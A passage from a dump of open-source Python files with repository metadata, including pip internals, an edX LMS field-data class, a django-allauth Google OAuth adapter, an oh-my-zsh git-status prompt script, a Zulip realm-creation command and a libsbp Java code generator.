values = [name] + map(lambda x: properties.setdefault(x, ""), usedProperties)
print "\t".join(values)
else:
maxPropertyLength = max(map(len, usedProperties))
for name, properties in objects.items():
print "Squish internal name: %s" % name
print "Properties:"
for key, val in properties.items():
print "%s: %s" % (key.rjust(maxPropertyLength + 4), val)
print
return 0
if __name__ == '__main__':
parseCommandLine()
sys.exit(main())
|
dsajkl/123
|
refs/heads/master
|
lms/lib/xblock/field_data.py
|
63
|
"""
:class:`~xblock.field_data.FieldData` subclasses used by the LMS
"""
from xblock.field_data import ReadOnlyFieldData, SplitFieldData
from xblock.fields import Scope
class LmsFieldData(SplitFieldData):
"""
A :class:`~xblock.field_data.FieldData` that
reads all UserScope.ONE and UserScope.ALL fields from `student_data`
and all UserScope.NONE fields from `authored_data`. It also prevents
writing to `authored_data`.
"""
def __init__(self, authored_data, student_data):
# Make sure that we don't repeatedly nest LmsFieldData instances
if isinstance(authored_data, LmsFieldData):
authored_data = authored_data._authored_data # pylint: disable=protected-member
else:
authored_data = ReadOnlyFieldData(authored_data)
self._authored_data = authored_data
self._student_data = student_data
super(LmsFieldData, self).__init__({
Scope.content: authored_data,
Scope.settings: authored_data,
Scope.parent: authored_data,
Scope.children: authored_data,
Scope.user_state_summary: student_data,
Scope.user_state: student_data,
Scope.user_info: student_data,
Scope.preferences: student_data,
})
|
aaleotti-unimore/ComicsScraper
|
refs/heads/master
|
lib/packaging/utils.py
|
1126
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import re
_canonicalize_regex = re.compile(r"[-_.]+")
def canonicalize_name(name):
# This is taken from PEP 503.
return _canonicalize_regex.sub("-", name).lower()
|
benschmaus/catapult
|
refs/heads/master
|
telemetry/telemetry/story/__init__.py
|
8
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from py_utils import cloud_storage # pylint: disable=import-error
from telemetry.story.shared_state import SharedState
from telemetry.story.story import Story
from telemetry.story.story_filter import StoryFilter
from telemetry.story.story_set import StorySet
PUBLIC_BUCKET = cloud_storage.PUBLIC_BUCKET
PARTNER_BUCKET = cloud_storage.PARTNER_BUCKET
INTERNAL_BUCKET = cloud_storage.INTERNAL_BUCKET
|
ttglennhall/DjangoGirlsTutorial
|
refs/heads/master
|
myvenv/lib/python3.4/site-packages/pip/basecommand.py
|
392
|
"""Base Command class, and related routines"""
import os
import sys
import tempfile
import traceback
import time
import optparse
from pip import cmdoptions
from pip.locations import running_under_virtualenv
from pip.log import logger
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.backwardcompat import StringIO
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.status_codes import (SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR)
from pip.util import get_prog
__all__ = ['Command']
class Command(object):
name = None
usage = None
hidden = False
def __init__(self):
parser_kw = {
'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(cmdoptions.general_group, self.parser)
self.parser.add_option_group(gen_opts)
def _build_session(self, options):
session = PipSession()
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle timeouts
if options.timeout:
session.timeout = options.timeout
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def setup_logging(self):
pass
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
level = 1 # Notify
level += options.verbose
level -= options.quiet
level = logger.level_for_integer(4 - level)
complete_log = []
logger.add_consumers(
(level, sys.stdout),
(logger.DEBUG, complete_log.append),
)
if options.log_explicit_levels:
logger.explicit_levels = True
self.setup_logging()
#TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.fatal('Could not find an activated virtualenv (required).')
sys.exit(VIRTUALENV_NOT_FOUND)
if options.log:
log_fp = open_logfile(options.log, 'a')
logger.add_consumers((logger.DEBUG, log_fp))
else:
log_fp = None
exit = SUCCESS
store_log = False
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
exit = status
except PreviousBuildDirError:
e = sys.exc_info()[1]
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError):
e = sys.exc_info()[1]
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = ERROR
except BadCommand:
e = sys.exc_info()[1]
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = ERROR
except CommandError:
e = sys.exc_info()[1]
logger.fatal('ERROR: %s' % e)
logger.info('Exception information:\n%s' % format_exc())
exit = ERROR
except KeyboardInterrupt:
logger.fatal('Operation cancelled by user')
logger.info('Exception information:\n%s' % format_exc())
store_log = True
exit = ERROR
except:
logger.fatal('Exception:\n%s' % format_exc())
store_log = True
exit = UNKNOWN_ERROR
if store_log:
log_file_fn = options.log_file
text = '\n'.join(complete_log)
try:
log_file_fp = open_logfile(log_file_fn, 'w')
except IOError:
temp = tempfile.NamedTemporaryFile(delete=False)
log_file_fn = temp.name
log_file_fp = open_logfile(log_file_fn, 'w')
logger.fatal('Storing debug log for failure in %s' % log_file_fn)
log_file_fp.write(text)
log_file_fp.close()
if log_fp is not None:
log_fp.close()
return exit
def format_exc(exc_info=None):
if exc_info is None:
exc_info = sys.exc_info()
out = StringIO()
traceback.print_exception(*exc_info, **dict(file=out))
return out.getvalue()
def open_logfile(filename, mode='a'):
"""Open the named log file in append mode.
If the file already exists, a separator will also be printed to
the file to separate past activity from current activity.
"""
filename = os.path.expanduser(filename)
filename = os.path.abspath(filename)
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
exists = os.path.exists(filename)
log_fp = open(filename, mode)
if exists:
log_fp.write('%s\n' % ('-' * 60))
log_fp.write('%s run on %s\n' % (sys.argv[0], time.strftime('%c')))
return log_fp
|
IV-GII/Django_Traduccion
|
refs/heads/master
|
allauth/socialaccount/providers/google/views.py
|
20
|
import requests
from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
OAuth2LoginView,
OAuth2CallbackView)
from .provider import GoogleProvider
class GoogleOAuth2Adapter(OAuth2Adapter):
provider_id = GoogleProvider.id
access_token_url = 'https://accounts.google.com/o/oauth2/token'
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
profile_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
def complete_login(self, request, app, token, **kwargs):
resp = requests.get(self.profile_url,
params={'access_token': token.token,
'alt': 'json'})
extra_data = resp.json()
login = self.get_provider() \
.sociallogin_from_response(request,
extra_data)
return login
oauth2_login = OAuth2LoginView.adapter_view(GoogleOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(GoogleOAuth2Adapter)
|
sudotliu/oh-my-zsh
|
refs/heads/master
|
plugins/git-prompt/gitstatus.py
|
343
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from subprocess import Popen, PIPE
import re
# change those symbols to whatever you prefer
symbols = {
'ahead of': '↑',
'behind': '↓',
'staged': '♦',
'changed': '‣',
'untracked': '…',
'clean': '⚡',
'unmerged': '≠',
'sha1': ':'
}
output, error = Popen(
['git', 'status'], stdout=PIPE, stderr=PIPE, universal_newlines=True).communicate()
if error:
import sys
sys.exit(0)
lines = output.splitlines()
behead_re = re.compile(
r"^# Your branch is (ahead of|behind) '(.*)' by (\d+) commit")
diverge_re = re.compile(r"^# and have (\d+) and (\d+) different")
status = ''
staged = re.compile(r'^# Changes to be committed:$', re.MULTILINE)
changed = re.compile(r'^# Changed but not updated:$', re.MULTILINE)
untracked = re.compile(r'^# Untracked files:$', re.MULTILINE)
unmerged = re.compile(r'^# Unmerged paths:$', re.MULTILINE)
def execute(*command):
out, err = Popen(stdout=PIPE, stderr=PIPE, *command).communicate()
if not err:
nb = len(out.splitlines())
else:
nb = '?'
return nb
if staged.search(output):
nb = execute(
['git', 'diff', '--staged', '--name-only', '--diff-filter=ACDMRT'])
status += '%s%s' % (symbols['staged'], nb)
if unmerged.search(output):
nb = execute(['git', 'diff', '--staged', '--name-only', '--diff-filter=U'])
status += '%s%s' % (symbols['unmerged'], nb)
if changed.search(output):
nb = execute(['git', 'diff', '--name-only', '--diff-filter=ACDMRT'])
status += '%s%s' % (symbols['changed'], nb)
if untracked.search(output):
status += symbols['untracked']
if status == '':
status = symbols['clean']
remote = ''
bline = lines[0]
if bline.find('Not currently on any branch') != -1:
branch = symbols['sha1'] + Popen([
'git',
'rev-parse',
'--short',
'HEAD'], stdout=PIPE).communicate()[0][:-1]
else:
branch = bline.split(' ')[-1]
bstatusline = lines[1]
match = behead_re.match(bstatusline)
if match:
remote = symbols[match.groups()[0]]
remote += match.groups()[2]
elif lines[2:]:
div_match = diverge_re.match(lines[2])
if div_match:
remote = "{behind}{1}{ahead of}{0}".format(
*div_match.groups(), **symbols)
print('\n'.join([branch, remote, status]))
|
HesselTjeerdsma/Cyber-Physical-Pacman-Game
|
refs/heads/master
|
Algor/flask/bin/rst2odt_prepstyles.py
|
1
|
#!/home/hessel/Cyber-Physical-Pacman-Game/Algor/flask/bin/python2
# $Id: rst2odt_prepstyles.py 5839 2009-01-07 19:09:28Z dkuhlman $
# Author: Dave Kuhlman <dkuhlman@rexx.com>
# Copyright: This module has been placed in the public domain.
"""
Fix a word-processor-generated styles.odt for odtwriter use: Drop page size
specifications from styles.xml in STYLE_FILE.odt.
"""
#
# Author: Michael Schutte <michi@uiae.at>
from lxml import etree
import sys
import zipfile
from tempfile import mkstemp
import shutil
import os
NAMESPACES = {
"style": "urn:oasis:names:tc:opendocument:xmlns:style:1.0",
"fo": "urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"
}
def prepstyle(filename):
zin = zipfile.ZipFile(filename)
styles = zin.read("styles.xml")
root = etree.fromstring(styles)
for el in root.xpath("//style:page-layout-properties",
namespaces=NAMESPACES):
for attr in el.attrib:
if attr.startswith("{%s}" % NAMESPACES["fo"]):
del el.attrib[attr]
tempname = mkstemp()
zout = zipfile.ZipFile(os.fdopen(tempname[0], "w"), "w",
zipfile.ZIP_DEFLATED)
for item in zin.infolist():
if item.filename == "styles.xml":
zout.writestr(item, etree.tostring(root))
else:
zout.writestr(item, zin.read(item.filename))
zout.close()
zin.close()
shutil.move(tempname[1], filename)
def main():
args = sys.argv[1:]
if len(args) != 1:
print >> sys.stderr, __doc__
print >> sys.stderr, "Usage: %s STYLE_FILE.odt\n" % sys.argv[0]
sys.exit(1)
filename = args[0]
prepstyle(filename)
if __name__ == '__main__':
main()
# vim:tw=78:sw=4:sts=4:et:
|
adnanh/zulip
|
refs/heads/master
|
zerver/management/commands/create_realm.py
|
115
|
from __future__ import absolute_import
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_create_realm, set_default_streams
from zerver.models import RealmAlias
if not settings.VOYAGER:
from zilencer.models import Deployment
import re
import sys
class Command(BaseCommand):
help = """Create a realm for the specified domain.
Usage: python manage.py create_realm --domain=foo.com --name='Foo, Inc.'"""
option_list = BaseCommand.option_list + (
make_option('-o', '--open-realm',
dest='open_realm',
action="store_true",
default=False,
help='Make this an open realm.'),
make_option('-d', '--domain',
dest='domain',
type='str',
help='The domain for the realm.'),
make_option('-n', '--name',
dest='name',
type='str',
help='The user-visible name for the realm.'),
make_option('--deployment',
dest='deployment_id',
type='int',
default=None,
help='Optionally, the ID of the deployment you want to associate the realm with.'),
)
def validate_domain(self, domain):
# Domains can't contain whitespace if they are to be used in memcached
# keys.
if re.search("\s", domain):
raise ValueError("Domains can't contain whitespace")
# Domains must look like domains, ie have the structure of
# <subdomain(s)>.<tld>. One reason for this is that bots need
# to have valid looking emails.
if len(domain.split(".")) < 2:
raise ValueError("Domains must contain a '.'")
if RealmAlias.objects.filter(domain=domain).count() > 0:
raise ValueError("Cannot create a new realm that is already an alias for an existing realm")
def handle(self, *args, **options):
if options["domain"] is None or options["name"] is None:
print >>sys.stderr, "\033[1;31mPlease provide both a domain and name.\033[0m\n"
self.print_help("python manage.py", "create_realm")
exit(1)
if options["open_realm"] and options["deployment_id"] is not None:
print >>sys.stderr, "\033[1;31mExternal deployments cannot be open realms.\033[0m\n"
self.print_help("python manage.py", "create_realm")
exit(1)
if options["deployment_id"] is not None and settings.VOYAGER:
print >>sys.stderr, "\033[1;31mExternal deployments are not supported on voyager deployments.\033[0m\n"
exit(1)
domain = options["domain"]
name = options["name"]
self.validate_domain(domain)
realm, created = do_create_realm(
domain, name, restricted_to_domain=not options["open_realm"])
if created:
print domain, "created."
if options["deployment_id"] is not None:
deployment = Deployment.objects.get(id=options["deployment_id"])
deployment.realms.add(realm)
deployment.save()
print "Added to deployment", str(deployment.id)
elif settings.ZULIP_COM:
deployment = Deployment.objects.get(base_site_url="https://zulip.com/")
deployment.realms.add(realm)
deployment.save()
# In the else case, we are not using the Deployments feature.
set_default_streams(realm, ["social", "engineering"])
print "\033[1;36mDefault streams set to social,engineering,zulip!\033[0m"
else:
print domain, "already exists."
|
yuweijun/learning-programming
|
refs/heads/master
|
language-python/count_lines.py
|
1
|
#! /usr/bin/python
import sys
data = sys.stdin.readlines()
print "counted", len(data), "lines."
|
swift-nav/libsbp
|
refs/heads/master
|
generator/sbpg/targets/java.py
|
6
|
#!/usr/bin/env python
# Copyright (C) 2015 Swift Navigation Inc.
# Contact: Bhaskar Mookerji <mookerji@swiftnav.com>
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""Generator for Java target.
This module consumes the YAML spec and generates Java code in the
target directory.
"""
import os
import os.path
from sbpg.targets.templating import JENV, ACRONYMS
TEMPLATE_NAME = "sbp_java.java.j2"
TEMPLATE_TABLE_NAME = "MessageTable.java.j2"
JAVA_TYPE_MAP = {'u8': 'int',
'u16': 'int',
'u32': 'long',
'u64': 'long',
's8': 'int',
's16': 'int',
's32': 'int',
's64': 'long',
'float': 'float',
'double': 'double',
'string': 'String'}
field_sizes = {
'u8' : 1,
'u16' : 2,
'u32' : 4,
'u64' : 8,
's8' : 1,
's16' : 2,
's32' : 4,
's64' : 8,
'float' : 4,
'double' : 8,
}
def classnameify(s):
"""
Makes a classname.
"""
return ''.join(w if w in ACRONYMS else w.title() for w in s.split('_'))
def commentify(value):
"""
Builds a comment.
"""
if value is None:
return
if len(value.split('\n')) == 1:
return "* " + value
else:
return '\n'.join([' * ' + l for l in value.split('\n')[:-1]])
def type_map(field):
if JAVA_TYPE_MAP.has_key(field.type_id):
return JAVA_TYPE_MAP[field.type_id]
elif field.type_id == 'array':
t = field.options['fill'].value
return JAVA_TYPE_MAP.get(t, t) + '[]'
else:
return field.type_id
def parse_type(field):
"""
Function to pull a type from the binary payload.
"""
if field.type_id == 'string':
if field.options.has_key('size'):
return "parser.getString(%d)" % field.options['size'].value
else:
return "parser.getString()"
elif field.type_id in JAVA_TYPE_MAP.keys():
# Primitive java types have extractor methods in SBPMessage.Parser
return "parser.get" + field.type_id.capitalize() + "()"
if field.type_id == 'array':
# Call function to build array
t = field.options['fill'].value
if t in JAVA_TYPE_MAP.keys():
if field.options.has_key('size'):
return "parser.getArrayof%s(%d)" % (t.capitalize(), field.options['size'].value)
else:
return "parser.getArrayof%s()" % t.capitalize()
else:
if field.options.has_key('size'):
return "parser.getArray(%s.class, %d)" % (t, field.options['size'].value)
else:
return "parser.getArray(%s.class)" % t
else:
# This is an inner class, call default constructor
return "new %s().parse(parser)" % field.type_id
def build_type(field):
"""
Function to pack a type into the binary payload.
"""
if field.type_id == 'string':
if field.options.has_key('size'):
return "builder.putString(%s, %d)" % (field.identifier, field.options['size'].value)
else:
return "builder.putString(%s)" % field.identifier
elif field.type_id in JAVA_TYPE_MAP.keys():
# Primitive java types have extractor methods in SBPMessage.Builder
return "builder.put%s(%s)" % (field.type_id.capitalize(), field.identifier)
if field.type_id == 'array':
# Call function to build array
t = field.options['fill'].value
if t in JAVA_TYPE_MAP.keys():
if field.options.has_key('size'):
return "builder.putArrayof%s(%s, %d)" % (t.capitalize(),
field.identifier,
field.options['size'].value)
else:
return "builder.putArrayof%s(%s)" % (t.capitalize(), field.identifier)
else:
if field.options.has_key('size'):
return "builder.putArray(%s, %d)" % (field.identifier, field.options['size'].value)
else:
return "builder.putArray(%s)" % field.identifier
else:
return "%s.build(builder)" % field.identifier
def jsonify(field):
if field.type_id in JAVA_TYPE_MAP.keys():
return field.identifier
elif field.type_id == 'array':
if field.options['fill'].value in JAVA_TYPE_MAP.keys():
return "new JSONArray(%s)" % field.identifier
else:
return "SBPStruct.toJSONArray(%s)" % field.identifier
else:
return field.identifier + ".toJSON()"
JENV.filters['classnameify'] = classnameify
JENV.filters['commentify'] = commentify
JENV.filters['type_map'] = type_map
JENV.filters['parse_type'] = parse_type
JENV.filters['build_type'] = build_type
JENV.filters['jsonify'] = jsonify
def render_source(output_dir, package_spec, jenv=JENV):
"""
Render and output
"""
path, module_name = package_spec.filepath
java_template = jenv.get_template(TEMPLATE_NAME)
module_path = "com." + package_spec.identifier
yaml_filepath = "/".join(package_spec.filepath) + ".yaml"
includes = [".".join(i.split(".")[:-1]) for i in package_spec.includes]
includes = [i for i in includes if i != "types"]
for msg in package_spec.definitions:
msg_name = classnameify(msg.identifier) if msg.sbp_id else msg.identifier
l = "/".join(package_spec.filepath)
destination_filename = "%s/com/%s/%s.java" % (output_dir, l , msg_name)
# Create the output directory if it doesn't exist
if not os.path.exists(os.path.dirname(destination_filename)):
os.mkdir(os.path.dirname(destination_filename))
with open(destination_filename, 'w+') as f:
print destination_filename
f.write(java_template.render(m=msg,
filepath=yaml_filepath,
module_path=module_path,
include=includes,
description=package_spec.description))
def render_table(output_dir, packages, jenv=JENV):
"""
Render and output dispatch table
"""
destination_filename = output_dir + "/com/swiftnav/sbp/client/MessageTable.java"
with open(destination_filename, 'w+') as f:
print destination_filename
f.write(jenv.get_template(TEMPLATE_TABLE_NAME).render(packages=packages))
|
algorhythms/LintCode
|
refs/heads/master
|
Count of Smaller Number.py
|
4
|
"""
Give you an integer array (index from 0 to n-1, where n is the size of this array, value from 0 to 10000) and an query
list. For each query, give you an integer, return the number of element in the array that are smaller that the given
integer.
Example
For array [1,2,7,8,5], and queries [1,8,5], return [0,4,2]
Note
We suggest you finish problem Segment Tree Build and Segment Tree Query II first.
Challenge
Could you use three ways to do it.
Just loop
Sort and binary search
Build Segment Tree and Search.
"""
__author__ = 'Daniel'
class Solution:
def countOfSmallerNumber(self, A, queries):
# return self.loop(A, queries)
return self.search(A, queries)
def loop(self, A, queries):
"""
O(N*k)
"""
cnt = dict(zip(queries, [0 for _ in queries]))
for elt in A:
for k in cnt.keys():
if elt<k:
cnt[k] += 1
return [cnt[i] for i in queries]
def search(self, A, queries):
"""
O(nlgn + klgn)
"""
A.sort()
ret = []
for q in queries:
ind = self.bin_search(A, q)
while ind>=0 and A[ind]==q:
ind -= 1
ret.append(ind+1)
return ret
def bin_search(self, A, t):
b = 0
e = len(A)
while b<e:
m = (b+e)/2
if t==A[m]:
return m
elif t < A[m]:
e = m
else:
b = m+1
return b-1
def segment_tree(self, A, queries):
# TODO
pass
|
polyval/CNC
|
refs/heads/master
|
flask/Lib/site-packages/pip/utils/__init__.py
|
186
|
from __future__ import absolute_import
import contextlib
import errno
import locale
import logging
import re
import os
import posixpath
import shutil
import stat
import subprocess
import sys
import tarfile
import zipfile
from pip.exceptions import InstallationError
from pip.compat import console_to_str, stdlib_pkgs
from pip.locations import (
site_packages, user_site, running_under_virtualenv, virtualenv_no_global,
write_delete_marker_file,
)
from pip._vendor import pkg_resources
from pip._vendor.six.moves import input
from pip._vendor.six import PY2
from pip._vendor.retrying import retry
if PY2:
from io import BytesIO as StringIO
else:
from io import StringIO
__all__ = ['rmtree', 'display_path', 'backup_dir',
'ask', 'Inf', 'normalize_name', 'splitext',
'format_size', 'is_installable_dir',
'is_svn_page', 'file_contents',
'split_leading_dir', 'has_leading_dir',
'make_path_relative', 'normalize_path',
'renames', 'get_terminal_size', 'get_prog',
'unzip_file', 'untar_file', 'unpack_file', 'call_subprocess',
'captured_stdout', 'remove_tracebacks', 'ensure_dir',
'ARCHIVE_EXTENSIONS', 'SUPPORTED_EXTENSIONS',
'get_installed_version']
logger = logging.getLogger(__name__)
BZ2_EXTENSIONS = ('.tar.bz2', '.tbz')
ZIP_EXTENSIONS = ('.zip', '.whl')
TAR_EXTENSIONS = ('.tar.gz', '.tgz', '.tar')
ARCHIVE_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS
try:
import bz2 # noqa
SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS
except ImportError:
logger.debug('bz2 module is not available')
SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + TAR_EXTENSIONS
def import_or_raise(pkg_or_module_string, ExceptionType, *args, **kwargs):
try:
return __import__(pkg_or_module_string)
except ImportError:
raise ExceptionType(*args, **kwargs)
def ensure_dir(path):
"""os.path.makedirs without EEXIST."""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def get_prog():
try:
if os.path.basename(sys.argv[0]) in ('__main__.py', '-c'):
return "%s -m pip" % sys.executable
except (AttributeError, TypeError, IndexError):
pass
return 'pip'
# Retry every half second for up to 3 seconds
@retry(stop_max_delay=3000, wait_fixed=500)
def rmtree(dir, ignore_errors=False):
shutil.rmtree(dir, ignore_errors=ignore_errors,
onerror=rmtree_errorhandler)
def rmtree_errorhandler(func, path, exc_info):
"""On Windows, the files in .svn are read-only, so when rmtree() tries to
remove them, an exception is thrown. We catch that here, remove the
read-only attribute, and hopefully continue without problems."""
# if file type currently read only
if os.stat(path).st_mode & stat.S_IREAD:
# convert to read/write
os.chmod(path, stat.S_IWRITE)
# use the original function to repeat the operation
func(path)
return
else:
raise
def display_path(path):
"""Gives the display value for a given path, making it relative to cwd
if possible."""
path = os.path.normcase(os.path.abspath(path))
if sys.version_info[0] == 2:
path = path.decode(sys.getfilesystemencoding(), 'replace')
path = path.encode(sys.getdefaultencoding(), 'replace')
if path.startswith(os.getcwd() + os.path.sep):
path = '.' + path[len(os.getcwd()):]
return path
def backup_dir(dir, ext='.bak'):
"""Figure out the name of a directory to back up the given dir to
(adding .bak, .bak2, etc)"""
n = 1
extension = ext
while os.path.exists(dir + extension):
n += 1
extension = ext + str(n)
return dir + extension
def ask_path_exists(message, options):
for action in os.environ.get('PIP_EXISTS_ACTION', '').split():
if action in options:
return action
return ask(message, options)
def ask(message, options):
"""Ask the message interactively, with the given possible responses"""
while 1:
if os.environ.get('PIP_NO_INPUT'):
raise Exception(
'No input was expected ($PIP_NO_INPUT set); question: %s' %
message
)
response = input(message)
response = response.strip().lower()
if response not in options:
print(
'Your response (%r) was not one of the expected responses: '
'%s' % (response, ', '.join(options))
)
else:
return response
class _Inf(object):
"""I am bigger than everything!"""
def __eq__(self, other):
if self is other:
return True
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __repr__(self):
return 'Inf'
Inf = _Inf() # this object is not currently used as a sortable in our code
del _Inf
_normalize_re = re.compile(r'[^a-z]', re.I)
def normalize_name(name):
return _normalize_re.sub('-', name.lower())
def format_size(bytes):
if bytes > 1000 * 1000:
return '%.1fMB' % (bytes / 1000.0 / 1000)
elif bytes > 10 * 1000:
return '%ikB' % (bytes / 1000)
elif bytes > 1000:
return '%.1fkB' % (bytes / 1000.0)
else:
return '%ibytes' % bytes
def is_installable_dir(path):
"""Return True if `path` is a directory containing a setup.py file."""
if not os.path.isdir(path):
return False
setup_py = os.path.join(path, 'setup.py')
if os.path.isfile(setup_py):
return True
return False
def is_svn_page(html):
"""
Returns true if the page appears to be the index page of an svn repository
"""
return (re.search(r'<title>[^<]*Revision \d+:', html) and
re.search(r'Powered by (?:<a[^>]*?>)?Subversion', html, re.I))
def file_contents(filename):
with open(filename, 'rb') as fp:
return fp.read().decode('utf-8')
def split_leading_dir(path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\')) or
'\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(paths):
"""Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)"""
common_prefix = None
for path in paths:
prefix, rest = split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
def make_path_relative(path, rel_to):
"""
Make a filename relative, where the filename path, and it is
relative to rel_to
>>> make_path_relative('/usr/share/something/a-file.pth',
... '/usr/share/another-place/src/Directory')
'../../../something/a-file.pth'
>>> make_path_relative('/usr/share/something/a-file.pth',
... '/home/user/src/Directory')
'../../../usr/share/something/a-file.pth'
>>> make_path_relative('/usr/share/a-file.pth', '/usr/share/')
'a-file.pth'
"""
path_filename = os.path.basename(path)
path = os.path.dirname(path)
path = os.path.normpath(os.path.abspath(path))
rel_to = os.path.normpath(os.path.abspath(rel_to))
path_parts = path.strip(os.path.sep).split(os.path.sep)
rel_to_parts = rel_to.strip(os.path.sep).split(os.path.sep)
while path_parts and rel_to_parts and path_parts[0] == rel_to_parts[0]:
path_parts.pop(0)
rel_to_parts.pop(0)
full_parts = ['..'] * len(rel_to_parts) + path_parts + [path_filename]
if full_parts == ['']:
return '.' + os.path.sep
return os.path.sep.join(full_parts)
def normalize_path(path, resolve_symlinks=True):
"""
Convert a path to its canonical, case-normalized, absolute version.
"""
path = os.path.expanduser(path)
if resolve_symlinks:
path = os.path.realpath(path)
else:
path = os.path.abspath(path)
return os.path.normcase(path)
def splitext(path):
"""Like os.path.splitext, but take off .tar too"""
base, ext = posixpath.splitext(path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
def renames(old, new):
"""Like os.renames(), but handles renaming across devices."""
# Implementation borrowed from os.renames().
head, tail = os.path.split(new)
if head and tail and not os.path.exists(head):
os.makedirs(head)
shutil.move(old, new)
head, tail = os.path.split(old)
if head and tail:
try:
os.removedirs(head)
except OSError:
pass
def is_local(path):
"""
Return True if path is within sys.prefix, if we're running in a virtualenv.
If we're not in a virtualenv, all paths are considered "local."
"""
if not running_under_virtualenv():
return True
return normalize_path(path).startswith(normalize_path(sys.prefix))
def dist_is_local(dist):
"""
Return True if given Distribution object is installed locally
(i.e. within current virtualenv).
Always True if we're not in a virtualenv.
"""
return is_local(dist_location(dist))
def dist_in_usersite(dist):
"""
Return True if given Distribution is installed in user site.
"""
norm_path = normalize_path(dist_location(dist))
return norm_path.startswith(normalize_path(user_site))
def dist_in_site_packages(dist):
"""
Return True if given Distribution is installed in
distutils.sysconfig.get_python_lib().
"""
return normalize_path(
dist_location(dist)
).startswith(normalize_path(site_packages))
def dist_is_editable(dist):
"""Is distribution an editable install?"""
# TODO: factor out determining editableness out of FrozenRequirement
from pip import FrozenRequirement
req = FrozenRequirement.from_dist(dist, [])
return req.editable
def get_installed_distributions(local_only=True,
skip=stdlib_pkgs,
include_editables=True,
editables_only=False,
user_only=False):
"""
Return a list of installed Distribution objects.
If ``local_only`` is True (default), only return installations
local to the current virtualenv, if in a virtualenv.
``skip`` argument is an iterable of lower-case project names to
ignore; defaults to stdlib_pkgs
If ``editables`` is False, don't report editables.
If ``editables_only`` is True , only report editables.
If ``user_only`` is True , only report installations in the user
site directory.
"""
if local_only:
local_test = dist_is_local
else:
def local_test(d):
return True
if include_editables:
def editable_test(d):
return True
else:
def editable_test(d):
return not dist_is_editable(d)
if editables_only:
def editables_only_test(d):
return dist_is_editable(d)
else:
def editables_only_test(d):
return True
if user_only:
user_test = dist_in_usersite
else:
def user_test(d):
return True
return [d for d in pkg_resources.working_set
if local_test(d) and
d.key not in skip and
editable_test(d) and
editables_only_test(d) and
user_test(d)
]
def egg_link_path(dist):
"""
Return the path for the .egg-link file if it exists, otherwise, None.
There's 3 scenarios:
1) not in a virtualenv
try to find in site.USER_SITE, then site_packages
2) in a no-global virtualenv
try to find in site_packages
3) in a yes-global virtualenv
try to find in site_packages, then site.USER_SITE
(don't look in global location)
For #1 and #3, there could be odd cases, where there's an egg-link in 2
locations.
This method will just return the first one found.
"""
sites = []
if running_under_virtualenv():
if virtualenv_no_global():
sites.append(site_packages)
else:
sites.append(site_packages)
if user_site:
sites.append(user_site)
else:
